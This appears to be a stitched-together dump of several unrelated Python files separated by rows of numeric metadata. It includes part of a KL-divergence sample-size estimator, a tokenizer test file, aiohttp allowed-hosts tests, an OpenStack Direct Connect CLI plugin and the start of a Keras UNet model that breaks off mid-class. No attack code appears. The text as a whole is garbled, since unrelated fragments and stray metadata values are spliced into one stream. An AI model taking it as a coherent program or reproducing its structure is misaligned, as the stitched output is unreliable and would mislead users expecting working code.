dataset_m = Dataset(X_m, y_m)
return self._uFunction(dataset_m)
def forward(self, features, target):
r"""
Returns sample size prediction for the given dataset.
:param features: The tensor of shape
`num_elements` :math:`\times` `num_feature`.
:type features: array.
:param target: The tensor of shape `num_elements`.
:type target: array.
:return: sample size estimation for the given dataset.
:rtype: dict
"""
self.dataset = Dataset(features, target)
if self.end is None:
end = len(self.dataset) - 1
else:
end = self.end
if self.begin is None:
begin = 2*self.dataset.n
else:
begin = self.begin
if end <= begin:
raise ValueError(
"The end value must be greater than the begin value but {}<={}".format(
end, begin))
if self.num >= end - begin:
raise ValueError(
"The num value must be smaler than (end - begin) but {}>={}".format(
self.num, end - begin))
subset_sizes = np.arange(begin, end, self.num, dtype=np.int64)
list_of_answers = []
points_one = np.ones(self.averaging, dtype=np.int64)
if self.multiprocess:
pool = Pool()
mapping = pool.map
else:
mapping = map
if self.progressbar:
iterator = self._progressbar(subset_sizes)
else:
iterator = subset_sizes
for i, m in enumerate(iterator):
list_of_answers.append(
np.asarray(
list(mapping(self._score_subsample, m*points_one))))
self._set_status(100.*(i+1)/len(subset_sizes))
if self.multiprocess:
pool.close()
pool.join()
list_of_answers = np.asarray(list_of_answers)
list_of_E = np.mean(list_of_answers, axis = 1)
list_of_S = np.std(list_of_answers, axis = 1)
return {'m*': subset_sizes[np.argmax(np.array(list_of_E))],
'E': np.array(list_of_E),
'S': np.array(list_of_S),
'm': np.array(subset_sizes),
}
class KLEstimator(SampleSizeEstimator):
r"""
Description of KL based Method
:param statmodel: the machine learning algorithm
:type statmodel: RegressionModel or LogisticModel
:param averaging: to do
:type averaging: float
:param epsilon: to do
:type epsilon: float
:param begin: to do
:type begin: int
:param end: to do
:type end: int
:param num: to do
:type num: int
:param multiprocess: to do
:type multiprocess: bool
:param progressbar: to do
:type progressbar: bool
"""
def __init__(self, statmodel, **kwards):
r"""Constructor method
"""
super().__init__()
self.statmodel = statmodel
self.averaging = int(kwards.pop('averaging', 5))
if self.averaging <= 0:
raise ValueError(
"The averaging should be positive but get {}".format(
self.averaging))
self.epsilon = kwards.pop('epsilon', 0.01)
if self.epsilon <= 0:
raise ValueError(
"The epsilon must be positive value but get {}".format(
self.epsilon))
self.begin = kwards.pop('begin', None)
if self.begin is not None and self.begin < 0:
raise ValueError(
"The begin must be positive value but get {}".format(
self.begin))
self.end = kwards.pop('end', None)
if self.end is not None and self.end < 0:
raise ValueError(
"The end must be positive value but get {}".format(
self.end))
if self.end is not None and self.begin is not None and self.end <= self.begin:
raise ValueError(
"The end value must be greater than the begin value but {}<={}".format(
self.end, self.begin))
self.num = kwards.pop('num', 5)
if self.num <=0:
raise ValueError(
"The num must be positive value but get {}".format(
self.num))
if self.end is not None and self.begin is not None and self.num >= self.end - self.begin:
raise ValueError(
"The num value must be smaler than (end - begin) but {}>={}".format(
self.num, self.end - self.begin))
self.multiprocess = kwards.pop('multiprocess', False)
if not isinstance(self.multiprocess, bool):
raise ValueError(
"The multiprocess must be bool value but get {}".format(
self.multiprocess))
self.progressbar = kwards.pop('progressbar', False)
if not isinstance(self.progressbar, bool):
raise ValueError(
"The progressbar must be bool value but get {}".format(
self.progressbar))
if kwards:
raise ValueError("Invalid parameters: %s" % str(kwards))
self.dataset = None
@staticmethod
def D_KL_normal(m_0, cov_0, m_1, cov_1, cov_0_inv, cov_1_inv):
m_0 = np.array(m_0, ndmin=1)
m_1 = np.array(m_1, ndmin=1)
cov_0 = np.array(cov_0, ndmin=2)
cov_1 = np.array(cov_1, ndmin=2)
D_KL_1 = np.sum(np.diagonal(cov_1@cov_0_inv))
D_KL_2 = float(np.reshape((m_1 - m_0), [1, -1])@cov_1@np.reshape((m_1 - m_0), [-1, 1]))
D_KL_3 = -m_0.shape[0]
D_KL_4 = float(np.log(np.linalg.det(cov_0)/np.linalg.det(cov_1)))
return 0.5*(D_KL_1 + D_KL_2 + D_KL_3 + D_KL_4)
def _klFunction(self, dataset):
r"""
Return ...
"""
X, y = dataset.sample()
model_0 = self.statmodel(y, X)
m_0 = model_0.fit()
cov_0_inv = 0.01*np.eye(m_0.shape[0]) - model_0.hessian(m_0)
cov_0 = np.linalg.inv(cov_0_inv)
# ind = np.random.randint(0, X.shape[0])
indexes = np.random.permutation(X.shape[0])
list_of_res = []
for ind in indexes:
X_new = np.delete(X, ind, axis = 0)
y_new = np.delete(y, ind, axis = 0)
model_1 = self.statmodel(y_new, X_new)
m_1 = model_1.fit()
cov_1_inv = 0.01*np.eye(m_1.shape[0]) - model_1.hessian(m_1)
cov_1 = np.linalg.inv(cov_1_inv)
list_of_res.append(
self.D_KL_normal(m_0, cov_0, m_1, cov_1, cov_0_inv, cov_1_inv))
return np.mean(list_of_res)
def _score_subsample(self, m):
r"""
Return ...
"""
X_m, y_m = self.dataset.sample(m)
dataset_m = Dataset(X_m, y_m)
return self._klFunction(dataset_m)
def forward(self, features, target):
r"""
Returns sample size prediction for the given dataset.
:param features: The tensor of shape
`num_elements` :math:`\times` `num_feature`.
:type features: array.
:param target: The tensor of shape `num_elements`.
:type target: array.
:return: sample size estimation for the given dataset.
:rtype: dict
"""
self.dataset = Dataset(features, target)
if self.end is None:
end = len(self.dataset) - 1
else:
end = self.end
if self.begin is None:
begin = 2*self.dataset.n
else:
begin = self.begin
if end <= begin:
raise ValueError(
"The end value must be greater than the begin value but {}<={}".format(
end, begin))
if self.num >= end - begin:
raise ValueError(
"The num value must be smaler than (end - begin) but {}>={}".format(
self.num, end - begin))
subset_sizes = np.arange(begin, end, self.num, dtype=np.int64)
list_of_answers = []
points_one = np.ones(self.averaging, dtype=np.int64)
if self.multiprocess:
pool = Pool()
mapping = pool.map
else:
mapping = map
if self.progressbar:
iterator = self._progressbar(subset_sizes)
else:
iterator = subset_sizes
for i, m in enumerate(iterator):
list_of_answers.append(
np.asarray(
list(mapping(self._score_subsample, m*points_one))))
self._set_status(100.*(i+1)/len(subset_sizes))
if self.multiprocess:
pool.close()
pool.join()
list_of_answers = np.asarray(list_of_answers)
list_of_E = np.mean(list_of_answers, axis = 1)
list_of_S = np.std(list_of_answers, axis = 1)
m_size = end
for m, mean in zip(reversed(subset_sizes), reversed(list_of_E)):
if mean < self.epsilon:
m_size = m
return {'m*': m_size,
'E': np.array(list_of_E),
'S': np.array(list_of_S),
'm': np.array(subset_sizes),
}
| 32.193159
| 107
| 0.545344
| 3,934
| 32,000
| 4.331469
| 0.057448
| 0.023592
| 0.060211
| 0.034742
| 0.892782
| 0.88885
| 0.887441
| 0.887441
| 0.880575
| 0.876115
| 0
| 0.012586
| 0.346969
| 32,000
| 993
| 108
| 32.225579
| 0.802843
| 0.136938
| 0
| 0.830918
| 0
| 0
| 0.121208
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033816
| false
| 0
| 0.011272
| 0
| 0.078905
| 0.00161
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1ef528c9478486c938c78de9dcdd098425597183
| 3,147
|
py
|
Python
|
tests/test_tokenize.py
|
BeTKH/articlenizer
|
7f18a630c71fcb7c80c710b9ef3870e460f49cac
|
[
"MIT"
] | 1
|
2022-01-04T11:58:36.000Z
|
2022-01-04T11:58:36.000Z
|
tests/test_tokenize.py
|
BeTKH/articlenizer
|
7f18a630c71fcb7c80c710b9ef3870e460f49cac
|
[
"MIT"
] | null | null | null |
tests/test_tokenize.py
|
BeTKH/articlenizer
|
7f18a630c71fcb7c80c710b9ef3870e460f49cac
|
[
"MIT"
] | 1
|
2022-02-15T17:09:37.000Z
|
2022-02-15T17:09:37.000Z
|
import pytest
from articlenizer import articlenizer
def test_tokenization_with_spaces():
s = 'Tokenization is tested with a single sentence, which requires an example such as the sentence: "Data processing and statistical analyses were conducted using IBM SPSS 22.0 (IBM Corp., Armonk, NY), MATLAB R2015a (The MathWorks, Natick, MA), R 3.3.2 R2.11.1 (http://www.R-project.org/), and Python libraries for scientific computation (NumPy, and SciPy) [39]."'
s = articlenizer.tokenize_text(s, representation='spaces')
assert s == ['Tokenization', ' ', 'is', ' ', 'tested', ' ', 'with', ' ', 'a', ' ', 'single', ' ', 'sentence', ',', ' ', 'which', ' ', 'requires', ' ', 'an', ' ', 'example', ' ', 'such', ' ', 'as', ' ', 'the', ' ', 'sentence', ':', ' ', '"', 'Data', ' ', 'processing', ' ', 'and', ' ', 'statistical', ' ', 'analyses', ' ', 'were', ' ', 'conducted', ' ', 'using', ' ', 'IBM', ' ', 'SPSS', ' ', '22.0', ' ', '(', 'IBM', ' ', 'Corp', '.', ',', ' ', 'Armonk', ',', ' ', 'NY', ')', ',', ' ', 'MATLAB', ' ', 'R', '2015a', ' ', '(', 'The', ' ', 'MathWorks', ',', ' ', 'Natick', ',', ' ', 'MA', ')', ',', ' ', 'R', ' ', '3.3.2', ' ', 'R', '2.11.1', ' ', '(', 'http://www.R-project.org/', ')', ',', ' ', 'and', ' ', 'Python', ' ', 'libraries', ' ', 'for', ' ', 'scientific', ' ', 'computation', ' ', '(', 'NumPy', ',', ' ', 'and', ' ', 'SciPy', ')', ' ', '[39]', '.', '"']
def test_tokenization_without_spaces():
s = 'Tokenization is tested with a single sentence, which requires an example such as the sentence: "Data processing and statistical analyses were conducted using IBM SPSS 22.0 (IBM Corp., Armonk, NY), MATLAB R2015a (The MathWorks, Natick, MA), R 3.3.2 (http://www.R-project.org/), and Python libraries for scientific computation (NumPy, and SciPy) [39]."'
s = articlenizer.tokenize_text(s)
assert s == ['Tokenization', 'is', 'tested', 'with', 'a', 'single', 'sentence', ',', 'which', 'requires', 'an', 'example', 'such', 'as', 'the', 'sentence', ':', '"', 'Data', 'processing', 'and', 'statistical', 'analyses', 'were', 'conducted', 'using', 'IBM', 'SPSS', '22.0', '(', 'IBM', 'Corp', '.', ',', 'Armonk', ',', 'NY', ')', ',', 'MATLAB', 'R', '2015a', '(', 'The', 'MathWorks', ',', 'Natick', ',', 'MA', ')', ',', 'R', '3.3.2', '(', 'http://www.R-project.org/', ')', ',', 'and', 'Python', 'libraries', 'for', 'scientific', 'computation', '(', 'NumPy', ',', 'and', 'SciPy', ')', '[39]', '.', '"']
def test_tokenization_without_spaces_application():
s = "Several softwares and R packages are available for Rasch model analysis such as ConQuest (https://shop.acer.edu.au/group/CON3), RUMM (www.rummlab.com.au), ltm (cran.r-project.org/package=ltm) and eRM (cran.r-project.org/package=eRm)."
s = articlenizer.tokenize_text(s)
print(s)
assert s == ['Several', 'softwares', 'and', 'R', 'packages', 'are', 'available', 'for', 'Rasch', 'model', 'analysis', 'such', 'as', 'ConQuest', '(', 'https://shop.acer.edu.au/group/CON3', ')', ',', 'RUMM', '(', 'www.rummlab.com.au', ')', ',', 'ltm', '(', 'cran.r-project.org/package=ltm', ')', 'and', 'eRM', '(', 'cran.r-project.org/package=eRm', ')', '.']
| 157.35
| 866
| 0.550683
| 365
| 3,147
| 4.712329
| 0.249315
| 0.037209
| 0.051163
| 0.048837
| 0.932558
| 0.917442
| 0.917442
| 0.917442
| 0.917442
| 0.917442
| 0
| 0.021755
| 0.152844
| 3,147
| 19
| 867
| 165.631579
| 0.623406
| 0
| 0
| 0.133333
| 0
| 0.2
| 0.578011
| 0.046393
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.2
| false
| 0
| 0.133333
| 0
| 0.333333
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
487f831c1832c68c006340c5d8bf28c5389fcbb2
| 1,538
|
py
|
Python
|
tests/test_allowed_hosts.py
|
rgacote/aiohttp-remotes
|
8b28757bc10ed7878e1bbc0539dcfb3b37cb5e96
|
[
"MIT"
] | 1
|
2019-08-20T17:18:39.000Z
|
2019-08-20T17:18:39.000Z
|
tests/test_allowed_hosts.py
|
rgacote/aiohttp-remotes
|
8b28757bc10ed7878e1bbc0539dcfb3b37cb5e96
|
[
"MIT"
] | null | null | null |
tests/test_allowed_hosts.py
|
rgacote/aiohttp-remotes
|
8b28757bc10ed7878e1bbc0539dcfb3b37cb5e96
|
[
"MIT"
] | null | null | null |
from aiohttp import web
from aiohttp_remotes import AllowedHosts
from aiohttp_remotes import setup as _setup
async def test_allowed_hosts_ok(aiohttp_client):
async def handler(request):
return web.Response()
app = web.Application()
app.router.add_get('/', handler)
await _setup(app, AllowedHosts({'example.com'}))
cl = await aiohttp_client(app)
resp = await cl.get('/', headers={'Host': 'example.com'})
assert resp.status == 200
async def test_allowed_hosts_forbidden(aiohttp_client):
async def handler(request):
return web.Response()
app = web.Application()
app.router.add_get('/', handler)
await _setup(app, AllowedHosts({'example.com'}))
cl = await aiohttp_client(app)
resp = await cl.get('/', headers={'Host': 'not-allowed.com'})
assert resp.status == 400
async def test_allowed_hosts_star(aiohttp_client):
async def handler(request):
return web.Response()
app = web.Application()
app.router.add_get('/', handler)
await _setup(app, AllowedHosts({'*'}))
cl = await aiohttp_client(app)
resp = await cl.get('/', headers={'Host': 'example.com'})
assert resp.status == 200
async def test_allowed_hosts_default(aiohttp_client):
async def handler(request):
return web.Response()
app = web.Application()
app.router.add_get('/', handler)
await _setup(app, AllowedHosts())
cl = await aiohttp_client(app)
resp = await cl.get('/', headers={'Host': 'example.com'})
assert resp.status == 200
| 29.576923
| 65
| 0.673602
| 197
| 1,538
| 5.101523
| 0.19797
| 0.063682
| 0.047761
| 0.075622
| 0.854726
| 0.806965
| 0.806965
| 0.806965
| 0.806965
| 0.806965
| 0
| 0.009615
| 0.188557
| 1,538
| 51
| 66
| 30.156863
| 0.795673
| 0
| 0
| 0.717949
| 0
| 0
| 0.061769
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 1
| 0
| false
| 0
| 0.076923
| 0
| 0.179487
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f88f1d945642bae59cbcabf2385aecc3ce8242a
| 15,990
|
py
|
Python
|
otcextensions/osclient/dcaas/v2/connection.py
|
gtema/python-otcextensions
|
e92dff75df4f59594a88dbb090f14990f4d6c729
|
[
"Apache-2.0"
] | 10
|
2018-03-03T17:59:59.000Z
|
2020-01-08T10:03:00.000Z
|
otcextensions/osclient/dcaas/v2/connection.py
|
OpenTelekomCloud/python-otcextensions
|
12f20b88a00d69160f6e4c69132a3cec6d5f7db1
|
[
"Apache-2.0"
] | 39
|
2018-03-26T14:43:23.000Z
|
2020-02-07T16:42:53.000Z
|
otcextensions/osclient/dcaas/v2/connection.py
|
gtema/python-otcextensions
|
e92dff75df4f59594a88dbb090f14990f4d6c729
|
[
"Apache-2.0"
] | 9
|
2018-03-27T09:17:40.000Z
|
2019-08-07T12:53:49.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Direct Connection v2 action implementations"""
import logging
from osc_lib import utils
from osc_lib.command import command
from otcextensions.i18n import _
from otcextensions.common import sdk_utils
LOG = logging.getLogger(__name__)
def _get_columns(item):
column_map = {
}
return sdk_utils.get_osc_show_columns_for_sdk_resource(item, column_map)
class ListDirectConnections(command.Lister):
_description = _("List of Direct Connections.")
columns = (
'id',
'name',
'port type',
'provider',
'bandwidth',
'location',
'status'
)
def get_parser(self, prog_name):
parser = super(ListDirectConnections, self).get_parser(prog_name)
parser.add_argument(
'--id',
metavar='<id>',
help=_("Specifies the ID of the Direct Connection.")
)
parser.add_argument(
'--name',
metavar='<name>',
help=_("Specified the name of Direct Connection.")
)
parser.add_argument(
'--port_type',
metavar='<port_type>',
help=_("Specified the port type of Direct Connection. The value "
"can be 1G or 10G.")
)
parser.add_argument(
'--bandwidth',
metavar='<bandwidth>',
type=int,
help=_("Specified the bandwidth of Direct Connection in Mbit/s.")
)
parser.add_argument(
'--location',
metavar='<location>',
help=_("Specified the access location of Direct Connection.")
)
parser.add_argument(
'--peer_location',
metavar='<peer_location>',
help=_("Specifies the location of the on-premises facility at "
"the other end of the connection, specific to the street "
"or data center name.")
)
parser.add_argument(
'--device_id',
metavar='<device_id>',
help=_("Specifies the gateway device ID of the Direct Connection.")
)
parser.add_argument(
'--interface_name',
metavar='<interface_name>',
help=_("Specifies the name of the interface accessed by the "
"Direct Connection.")
)
parser.add_argument(
'--redundant_id',
metavar='<redundant_id>',
help=_("Specifies the ID of the redundant connection using "
"the same gateway.")
)
parser.add_argument(
'--provider',
metavar='<provider>',
help=_("Specifies the carrier who provides the leased line.")
)
parser.add_argument(
'--provider_status',
metavar='<provider_status>',
help=_("Specifies the status of the carrier's leased line."
" The value can be ACTIVE or DOWN.")
)
parser.add_argument(
'--type',
metavar='<type>',
help=_("Specifies the connection type. The value can be hosted.")
)
parser.add_argument(
'--hosting_id',
metavar='<hosting_id>',
help=_("Specifies the ID of the operations connection on which"
" the hosted connection is created.")
)
parser.add_argument(
'--vlan',
metavar='<vlan>',
help=_("Specifies the VLAN pre-allocated to the hosted"
" connection.")
)
parser.add_argument(
'--charge_mode',
metavar='<charge_mode>',
help=_("Specifies the billing mode. The value can be prepayment,"
" bandwidth, or traffic.")
)
parser.add_argument(
'--apply_time',
metavar='<apply_time>',
help=_("Specifies the time when the connection is requested.")
)
parser.add_argument(
'--create_time',
metavar='<create_time>',
help=_("Specifies the time when the connection is created.")
)
parser.add_argument(
'--delete_time',
metavar='<delete_time>',
help=_("Specifies the time when the connection is deleted.")
)
parser.add_argument(
'--order_id',
metavar='<order_id>',
help=_("Specifies the order number of the connection.")
)
parser.add_argument(
'--product_id',
metavar='<product_id>',
help=_("Specifies the product ID corresponding to the "
"connection's order.")
)
parser.add_argument(
'--status',
metavar='<status>',
help=_("Specifies the connection status. The value can be ACTIVE, "
"DOWN, BUILD, ERROR, PENDING_DELETE, DELETED, APPLY, DENY, "
"PENDING_PAY, PAID, ORDERING, ACCEPT, or REJECTED.")
)
parser.add_argument(
'--admin_state_up',
metavar='<admin_state_up>',
help=_("Specifies the administrative status of the connection."
"The value can be true or false.")
)
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.dcaas
args_list = [
'id',
'name',
'port_type',
'bandwidth',
'location',
'peer_location',
'device_id',
'interface_name',
'redundant_id',
'provider',
'provider_status',
'type',
'hosting_id',
'vlan',
'charge_mode',
'apply_time',
'create_time',
'delete_time',
'order_id',
'product_id',
'status',
'admin_state_up'
]
attrs = {}
for arg in args_list:
val = getattr(parsed_args, arg)
if val:
attrs[arg] = val
data = client.connections(**attrs)
table = (self.columns, (utils.get_dict_properties(s, self.columns)
for s in data))
return table
class ShowDirectConnection(command.ShowOne):
_description = _("Show Direct Connection details.")
def get_parser(self, prog_name):
parser = super(ShowDirectConnection, self).get_parser(prog_name)
parser.add_argument(
'direct_connection',
metavar='<direct_connection>',
help=_("Specifies the connection ID or name.")
)
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.dcaas
obj = client.find_connection(parsed_args.direct_connection)
display_columns, columns = _get_columns(obj)
data = utils.get_item_properties(obj, columns)
return (display_columns, data)
class CreateDirectConnection(command.ShowOne):
_description = _("Create new Direct Connection")
def get_parser(self, prog_name):
parser = super(CreateDirectConnection, self).get_parser(prog_name)
parser.add_argument(
'port_type',
metavar='<port_type>',
help=_("Specified the port type of Direct Connection. The value "
"can be 1G or 10G.")
)
parser.add_argument(
'bandwidth',
metavar='<bandwidth>',
type=int,
help=_("Specified the bandwidth of Direct Connection in Mbit/s.")
)
parser.add_argument(
'location',
metavar='<location>',
help=_("Specified the access location of Direct Connection.")
)
parser.add_argument(
'provider',
metavar='<provider>',
help=_("Specifies the carrier who provides the leased line.")
)
parser.add_argument(
'--name',
metavar='<name>',
help=_("Specified the name of Direct Connection.")
)
parser.add_argument(
'--description',
metavar='<description>',
help=_("Provides supplementary information about the connection.")
)
parser.add_argument(
'--peer_location',
metavar='<peer_location>',
help=_("Specifies the location of the on-premises facility at "
"the other end of the connection, specific to the street "
"or data center name.")
)
parser.add_argument(
'--device_id',
metavar='<device_id>',
help=_("Specifies the gateway device ID of the Direct Connection.")
)
parser.add_argument(
'--interface_name',
metavar='<interface_name>',
help=_("Specifies the name of the interface accessed by the "
"Direct Connection.")
)
parser.add_argument(
'--redundant_id',
metavar='<redundant_id>',
help=_("Specifies the ID of the redundant connection using "
"the same gateway.")
)
parser.add_argument(
'--provider_status',
metavar='<provider_status>',
help=_("Specifies the status of the carrier's leased line. "
"The value can be ACTIVE or DOWN.")
)
parser.add_argument(
'--type',
metavar='<type>',
help=_("Specifies the connection type. The value can be hosted.")
)
parser.add_argument(
'--hosting_id',
metavar='<hosting_id>',
help=_("Specifies the ID of the operations connection on which "
"the hosted connection is created.")
)
parser.add_argument(
'--vlan',
metavar='<vlan>',
type=int,
help=_("Specifies the VLAN pre-allocated to the hosted "
"connection.")
)
parser.add_argument(
'--charge_mode',
metavar='<charge_mode>',
help=_("Specifies the billing mode. The value can be prepayment, "
"bandwidth, or traffic.")
)
parser.add_argument(
'--order_id',
metavar='<order_id>',
help=_("Specifies the order number of the connection.")
)
parser.add_argument(
'--product_id',
metavar='<product_id>',
help=_("Specifies the product ID corresponding to the "
"connection's order.")
)
parser.add_argument(
'--status',
metavar='<status>',
help=_("Specifies the connection status. The value can be ACTIVE, "
"DOWN, BUILD, ERROR, PENDING_DELETE, DELETED, APPLY, DENY, "
"PENDING_PAY, PAID, ORDERING, ACCEPT, or REJECTED.")
)
parser.add_argument(
'--admin_state_up',
metavar='<admin_state_up>',
type=bool,
help=_("Specifies the administrative status of the connection. "
"The value can be true or false.")
)
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.dcaas
args_list = [
'name',
'description',
'port_type',
'bandwidth',
'location',
'peer_location',
'device_id',
'interface_name',
'redundant_id',
'provider',
'provider_status',
'type',
'hosting_id',
'vlan',
'charge_mode',
'order_id',
'product_id',
'status',
'admin_state_up'
]
attrs = {}
for arg in args_list:
val = getattr(parsed_args, arg)
if val:
attrs[arg] = val
obj = client.create_connection(**attrs)
display_columns, columns = _get_columns(obj)
data = utils.get_item_properties(obj, columns)
return (display_columns, data)
class UpdateDirectConnection(command.ShowOne):
_description = _("Update a Direct Connection")
def get_parser(self, prog_name):
parser = super(UpdateDirectConnection, self).get_parser(prog_name)
parser.add_argument(
'direct_connection',
metavar='<direct_connection>',
help=_("Specifies the connection ID or name.")
)
parser.add_argument(
'--name',
metavar='<name>',
help=_("Specifies the connection name.")
)
parser.add_argument(
'--description',
metavar='<description>',
help=_("Provides supplementary information about the connection.")
)
parser.add_argument(
'--bandwidth',
metavar='<bandwidth>',
type=int,
help=_("Specifies the bandwidth of the connection in Mbit/s. "
"The value can be 1G or 10G.")
)
parser.add_argument(
'--provider_status',
metavar='<provider_status>',
help=_("Specifies the status of the carrier's leased line. "
"The value can be ACTIVE or DOWN.")
)
parser.add_argument(
'--order_id',
metavar='<order_id>',
help=_("Specifies the order number of the connection.")
)
parser.add_argument(
'--product_id',
metavar='<product_id>',
help=_("Specifies the product ID corresponding to the "
"connection's order.")
)
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.dcaas
args_list = [
'name',
'description',
'bandwidth',
'provider_status',
'order_id',
'product_id'
]
attrs = {}
for arg in args_list:
val = getattr(parsed_args, arg)
if val:
attrs[arg] = val
if parsed_args.direct_connection:
direct_connection = client.find_connection(
parsed_args.direct_connection
)
obj = client.update_connection(
direct_connection.id, **attrs
)
display_columns, columns = _get_columns(obj)
data = utils.get_item_properties(obj, columns)
return (display_columns, data)
class DeleteDirectConnection(command.Command):
_description = _("Delete the Direct Connection.")
def get_parser(self, prog_name):
parser = super(DeleteDirectConnection, self).get_parser(prog_name)
parser.add_argument(
'direct_connection',
metavar='<direct_connection>',
help=_("Direct Connection to delete.")
)
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.dcaas
if parsed_args.direct_connection:
direct_connection = client.find_connection(
parsed_args.direct_connection)
client.delete_connection(direct_connection.id)
| 32.901235
| 79
| 0.539212
| 1,552
| 15,990
| 5.353737
| 0.135309
| 0.054158
| 0.102299
| 0.051992
| 0.802022
| 0.799735
| 0.796847
| 0.784812
| 0.766518
| 0.74666
| 0
| 0.001564
| 0.3601
| 15,990
| 485
| 80
| 32.969072
| 0.810496
| 0.03546
| 0
| 0.724537
| 0
| 0
| 0.333312
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025463
| false
| 0
| 0.011574
| 0
| 0.085648
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fce464b5415f2aead0ab8012f6a34e10fe9dafa
| 49,703
|
py
|
Python
|
Codes/UNet_2DCNN.py
|
sucaicai4/UNet-Segmentation-AutoEncoder-1D-2D-Tensorflow-Keras
|
99824aa00f76fe75d7ebdbbcecd03151f75437a0
|
[
"MIT"
] | 1
|
2021-09-21T01:52:35.000Z
|
2021-09-21T01:52:35.000Z
|
Codes/UNet_2DCNN.py
|
sucaicai4/UNet-Segmentation-AutoEncoder-1D-2D-Tensorflow-Keras
|
99824aa00f76fe75d7ebdbbcecd03151f75437a0
|
[
"MIT"
] | null | null | null |
Codes/UNet_2DCNN.py
|
sucaicai4/UNet-Segmentation-AutoEncoder-1D-2D-Tensorflow-Keras
|
99824aa00f76fe75d7ebdbbcecd03151f75437a0
|
[
"MIT"
] | 1
|
2021-09-21T01:52:37.000Z
|
2021-09-21T01:52:37.000Z
|
'''Author: Sakib Mahmud'''
'''MIT License'''
'''Source: https://github.com/Sakib1263'''
# Import Necessary Libraries
import tensorflow as tf
def Conv_Block(inputs, model_width, kernel, multiplier):
# 1D Convolutional Block
x = tf.keras.layers.Conv2D(model_width * multiplier, kernel, padding='same')(inputs)
x = tf.keras.layers.BatchNormalization()(x)
x = tf.keras.layers.Activation('relu')(x)
return x
def trans_conv2D(inputs, model_width, multiplier):
# 1D Transposed Convolutional Block, used instead of UpSampling
x = tf.keras.layers.Conv2DTranspose(model_width * multiplier, (2,2), strides=(2,2), padding='same')(inputs) # Stride = 2, Kernel Size = 2
x = tf.keras.layers.BatchNormalization()(x)
x = tf.keras.layers.Activation('relu')(x)
return x
def Concat_Block(input1, *argv):
# Concatenation Block from the Keras Library
cat = input1
for arg in range(0, len(argv)):
cat = tf.keras.layers.concatenate([cat, argv[arg]], axis=-1)
return cat
def upConv_Block(inputs):
# 1D UpSampling Block
up = tf.keras.layers.UpSampling2D(size=(2, 2))(inputs)
return up
def Feature_Extraction_Block(inputs, model_width, Dim2, feature_number):
# Feature Extraction Block for the AutoEncoder Mode
latent = tf.keras.layers.Flatten()(inputs)
latent = tf.keras.layers.Dense(feature_number, name='features')(latent)
latent = tf.keras.layers.Dense(model_width * Dim2 * Dim2)(latent)
latent = tf.keras.layers.Reshape((Dim2, Dim2, model_width))(latent)
return latent
def MultiResBlock(inputs, model_width, kernel, multiplier, alpha):
''' MultiRes Block'''
# U {int} -- Number of filters in a corrsponding UNet stage
# inp {keras layer} -- input layer
w = alpha * model_width
shortcut = inputs
shortcut = Conv_Block(shortcut, int(w * 0.167) + int(w * 0.333) + int(w * 0.5), 1, multiplier)
conv3x3 = Conv_Block(inputs, int(w * 0.167), kernel, multiplier)
conv5x5 = Conv_Block(conv3x3, int(w * 0.333), kernel, multiplier)
conv7x7 = Conv_Block(conv5x5, int(w * 0.5), kernel, multiplier)
out = tf.keras.layers.concatenate([conv3x3, conv5x5, conv7x7], axis=-1)
out = tf.keras.layers.BatchNormalization()(out)
out = tf.keras.layers.Add()([shortcut, out])
out = tf.keras.layers.Activation('relu')(out)
out = tf.keras.layers.BatchNormalization()(out)
return out
def ResPath(inputs, model_depth, model_width, kernel, multiplier):
''' ResPath '''
# filters {int} -- [description]
# length {int} -- length of ResPath
# inp {keras layer} -- input layer
shortcut = inputs
shortcut = Conv_Block(shortcut, model_width, 1, multiplier)
out = Conv_Block(inputs, model_width, kernel, multiplier)
out = tf.keras.layers.Add()([shortcut, out])
out = tf.keras.layers.Activation('relu')(out)
out = tf.keras.layers.BatchNormalization()(out)
for i in range(1, model_depth):
shortcut = out
shortcut = Conv_Block(shortcut, model_width, 1, multiplier)
out = Conv_Block(out, model_width, kernel, multiplier)
out = tf.keras.layers.Add()([shortcut, out])
out = tf.keras.layers.Activation('relu')(out)
out = tf.keras.layers.BatchNormalization()(out)
return out
class UNet:
# Version 2 (v2) of all Models use Transposed Convolution instead of UpSampling
def __init__(self, length, width, model_depth, num_channel, model_width, kernel_size,
problem_type='Regression', output_nums=1, ds=0, ae=0, *argv):
# length: Input Image Length (x-dim)
